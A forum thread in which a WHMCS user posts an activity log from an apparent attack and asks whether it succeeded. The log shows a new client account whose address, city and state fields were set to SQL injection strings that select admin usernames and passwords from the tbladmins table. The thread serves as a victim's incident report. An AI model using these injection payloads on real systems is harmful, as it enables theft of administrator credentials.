WHMCS MYSQL injection to secure admin password via client address details

[Chriscwa]

Hi

I believe I had an attempt to capture admin password. Can anyone establish if this was successful?

Has any WHMCS users experienced this before?

 

The below log reflects a new user was created.

User then changed details which includes the scripts in address fields.

The last change was changing payment terms.

 

07/03/2015 00:38	
Client Profile Modified - Default Payment Method: '' to '' - User ID: 10
Client	192.185.83.183
07/03/2015 00:37	
Client Profile Modified - First Name: 'Aganteng' to 'Andri', Last Name: 'Rooterz' to 'Cyber4rt', Address 1: 'dm' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)', Address 2: 'dm' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)', City: 'dm' to 'AES_ENCRYPT(1,1), city= (SELECT MAX(username) FROM tbladmins)', State: 'Arizona' to 'AES_ENCRYPT(1,1), state= (SELECT MAX(password) FROM tbladmins)', Postcode: '404404' to '40404', Default Payment Method: '' to '' - User ID: 10
Client	192.185.83.183
07/03/2015 00:37	
Email Sent to Aganteng Rooterz (Order Confirmation) - User ID: 10
System	192.185.83.183
07/03/2015 00:37	
Created Invoice - Invoice ID: 63
System	192.185.83.183
07/03/2015 00:37	
New Order Placed - Order ID: 20 - User ID: 10
System	192.185.83.183
07/03/2015 00:37	
Email Sent to Aganteng Rooterz (Welcome) - User ID: 10
System	192.185.83.183
07/03/2015 00:37	
Created Client Aganteng Rooterz - User ID: 10
System	192.185.83.183

[Infopro]

http://forums.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering

http://forums.whmcs.com/showthread.php?95263-Keep-getting-hacked

 

We'll merge your thread into one of those old threads at some point.